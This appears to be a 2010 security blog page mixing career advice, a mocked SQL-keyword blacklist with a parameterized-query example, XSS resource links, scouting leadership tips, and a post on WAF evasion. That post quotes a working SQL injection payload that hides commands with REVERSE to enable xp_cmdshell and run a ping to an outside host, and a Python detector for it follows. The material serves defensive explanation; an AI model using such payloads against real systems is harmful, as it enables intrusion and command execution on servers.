Wednesday, May 19, 2010

Advice for information security professionals

http://preachsecurity.blogspot.com/2010/04/infosec-career-advice.html
has some valid suggestions for information security professionals:

"If you want to contribute meaningfully to the Information Security field - go do something else first... business analyst risk analyst project manager, developer...anything! Learn how the business works, learn what keeps you employed - learn how your company and business makes money."

"You probably already get the technology - but can you tell me how it applies to what the business does?"

Yes. Technology is only embraced by the business if it either saves money or makes money. No matter how smart or how technically savvy you are, you need to convince the business to buy in to security.

The funny way to prevent SQL injection

The funny way to prevent SQL injection from Sacramento Credit Union:

Why are the Security Questions used?
The first time you login and enroll in Protection Plus, you will be asked to enter five Security Questions and corresponding answers. The Security Questions are used if you do not want to register the computer you are currently using. With the Security Questions, we can make sure it is you logging in when you use different computers, such as an internet bar computer.

The answers to your Security Questions are case sensitive and cannot contain special characters like an apostrophe, or the words “insert,” “delete,” “drop,” “update,” “null,” or “select.”

Why can’t I use certain words like "drop" as part of my Security Question answers? There are certain words used by hackers to try to gain access to systems and manipulate data; therefore, the following words are restricted: "select," "delete," "update," "insert," "drop" and "null".


Google cache can be found at http://webcache.googleusercontent.com/search?q=cache%3A6LhOOjbpBVEJ%3Ahttps%3A%2F%2Fhomebank.sactocu.org%2FUA2004%2Ffaq-mfa.htm%2Bsactocu%2Bdrop%2Bselect&cd=1&hl=de&ct=clnk&client=ubuntu

They must have forgotten to add "shutdown" and "alter" to the list.
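As an added example (not code from the credit union or from the original post), here is the keyword blacklist the FAQ describes next to the parameterized query that makes such a blacklist unnecessary; the table, the user "alice" and her answer are constructed sample data:

```python
import sqlite3

# Words the credit union's FAQ forbids in security answers: a blacklist, not a fix.
BLACKLIST = {"insert", "delete", "drop", "update", "null", "select"}


def blacklist_rejects(answer: str) -> bool:
    """The FAQ's approach: refuse apostrophes and a fixed list of SQL keywords.
    It turns away legitimate answers such as O'Brien, yet misses anything not
    on the list (the post itself notes 'shutdown' and 'alter')."""
    lowered = answer.lower()
    return "'" in answer or any(word in lowered for word in BLACKLIST)


def setup() -> sqlite3.Connection:
    """Constructed sample data: one user whose stored answer contains an apostrophe."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE answers (username TEXT, question INTEGER, answer TEXT)")
    conn.execute("INSERT INTO answers VALUES (?, ?, ?)", ("alice", 1, "O'Brien"))
    return conn


def check_answer_concat(conn: sqlite3.Connection, username: str, question: int, answer: str) -> bool:
    """Vulnerable pattern: the answer is spliced into the SQL text, so an apostrophe
    is parsed as SQL syntax. This is the real reason the FAQ has to ban apostrophes."""
    sql = ("SELECT COUNT(*) FROM answers WHERE username = '%s' AND question = %d "
           "AND answer = '%s'" % (username, question, answer))
    return conn.execute(sql).fetchone()[0] == 1


def check_answer_param(conn: sqlite3.Connection, username: str, question: int, answer: str) -> bool:
    """Correct pattern: bound parameters keep the answer as data, never as SQL,
    so apostrophes and the words select/drop/... need no blacklist at all."""
    sql = "SELECT COUNT(*) FROM answers WHERE username = ? AND question = ? AND answer = ?"
    return conn.execute(sql, (username, question, answer)).fetchone()[0] == 1


def concat_breaks_on_apostrophe(conn: sqlite3.Connection) -> bool:
    """True when the concatenated query cannot even verify the legitimate answer."""
    try:
        check_answer_concat(conn, "alice", 1, "O'Brien")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = setup()
    print("blacklist rejects O'Brien:        ", blacklist_rejects("O'Brien"))
    print("concatenated query breaks on it:  ", concat_breaks_on_apostrophe(db))
    print("parameterized query verifies it:  ", check_answer_param(db, "alice", 1, "O'Brien"))
```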

Some links for XSS

Cross-Site Scripting (XSS) from OWASP

http://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29

XSS Prevention Cheat Sheet from OWASP

http://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet

Download link for Anti-XSS library V3.1

http://www.microsoft.com/downloads/details.aspx?FamilyId=051ee83c-5ccf-48ed-8463-02f56a6bfc09&displaylang=en


It comes with Sample code and Help file.

Additional resources about Anti-XSS library

Some FAQ questions about Anti-XSS library:

http://msdn.microsoft.com/en-us/security/aa973814.aspx

HTML Sanitization in Anti-XSS Library:

http://blogs.msdn.com/securitytools/archive/2009/09/01/html-sanitization-in-anti-xss-library.aspx

Difference between Anti-XSS library and HttpUtility.HtmlEncode

http://blogs.msdn.com/securitytools/archive/2009/07/09/differences-between-antixss-htmlencode-and-httputility-htmlencode-methods.aspx

The list of controls which automatically encode:
http://blogs.msdn.com/cisg/archive/2008/09/17/which-asp-net-controls-need-html-encoding.aspx

http://blogs.msdn.com/sfaust/attachment/8918996.ashx

Monday, May 17, 2010

Treasure hunting contest

http://twitpic.com/18bf61

An interesting blog about reverse blind SQL injection

The application is subject to blind SQL injection, and the company has deployed both a web application firewall and a network intrusion prevention system. The web application firewall appears to do an excellent job of staying current with the latest methods for bypassing WAF technologies.



However, the backward attack works: most SQL databases support a REVERSE function, so the keywords the firewall looks for never appear in the request in readable form. Here is the attack:

var=1';DECLARE @a varchar(200) DECLARE @b varchar(200) DECLARE @c varchar(200) SET @a = REVERSE ('1 ,"snoitpo decnavda wohs" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @b = REVERSE ('1,"llehsdmc_px" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @c =REVERSE('"moc.dragarten gnip" llehsdmc_px') EXEC (@c);--

http://snosoft.blogspot.com/2010/05/reversenoitcejni-lqs-dnilb-bank-hacking.html
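As an added example from the detection side (not code from the snosoft post or from any WAF product), this undoes REVERSE('...') over constant strings before signature matching, which is the one normalization a plain keyword filter lacks against the payload above; the request body and the two signatures are constructed for the demonstration:

```python
import re

# Constructed request body in the shape of the post's payload: the stored-procedure
# name is hidden by writing the string backwards and letting REVERSE() restore it.
SAMPLE_PAYLOAD = (
    "var=1';DECLARE @a varchar(200) "
    "SET @a = REVERSE('1 ,\"snoitpo decnavda wohs\" erugifnoc_ps.obd.retsam') "
    "EXEC (@a);--"
)

# Signatures a keyword-matching WAF might carry for this class of attack.
SIGNATURES = ("sp_configure", "xp_cmdshell")

# REVERSE('...') applied to a T-SQL string literal ('' is an escaped quote inside it).
REVERSE_LITERAL = re.compile(r"reverse\s*\(\s*'((?:[^']|'')*)'\s*\)", re.IGNORECASE)


def unreverse_literals(sql: str) -> str:
    """Evaluate every REVERSE('...') over a constant string so that matching sees
    what the database would execute. Non-constant arguments are left untouched."""
    return REVERSE_LITERAL.sub(lambda m: "'" + m.group(1)[::-1] + "'", sql)


def naive_match(sql: str) -> bool:
    """Signature check on the raw request: blind to the reversed literal."""
    lowered = sql.lower()
    return any(sig in lowered for sig in SIGNATURES)


def normalized_match(sql: str) -> bool:
    """The same signatures after undoing the REVERSE() encoding."""
    return naive_match(unreverse_literals(sql))


if __name__ == "__main__":
    print("raw request flagged:       ", naive_match(SAMPLE_PAYLOAD))
    print("normalized request flagged:", normalized_match(SAMPLE_PAYLOAD))
    print(unreverse_literals(SAMPLE_PAYLOAD))
```

Undoing one encoding catches one trick; the WAF stays a compensating control, and the fix for the application is still parameterized queries.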

Thursday, May 13, 2010

How to become a good leader?

From http://www.scouting.org/scoutsource/BoyScouts/PatrolLeader/s8.aspx

It is amazing how simple and truthful these tips are:
  1. Keep your Word. Don't make promises you can't keep.
  2. Be Fair to All. A good leader shows no favorites. Don't allow friendships to keep you from being fair to all members of your patrol. Know who likes to do what, and assign duties to patrol members by what they like to do.
  3. Be a Good Communicator. You don't need a commanding voice to be a good leader, but you must be willing to step out front with an effective "let's go." A good leader knows how to get and give information so that everyone understands what's going on.
  4. Be Flexible. Everything does not always go as planned. Be prepared to shift to "plan B" when "plan A" does not work.
  5. Be Organized. The time you spend planning will be repaid many times over. At patrol meetings, record who agrees to do each task, and fill out the duty roster before going camping.
  6. Delegate. Some leaders assume that the job will not get done unless they do it themselves. Most people like to be challenged with a task. Empower your patrol members to do things they have never tried.
  7. Set an Example. The most important thing you can do is lead by example. Whatever you do, your patrol members are likely to do the same. A cheerful attitude can keep everyone's spirits up.
  8. Be Consistent. Nothing is more confusing than a leader who is one way one moment and another way a short time later. If your patrol knows what to expect from you, they will more likely respond positively to your leadership.
  9. Give Praise. The best way to get credit is to give it away. Often a "Nice job" is all the praise necessary to make a Scout feel he is contributing to the efforts of the patrol.
  10. Ask for Help. Don't be embarrassed to ask for help. You have many resources at your disposal. When confronted with a situation you don't know how to handle, ask someone with more experience for some advice and direction.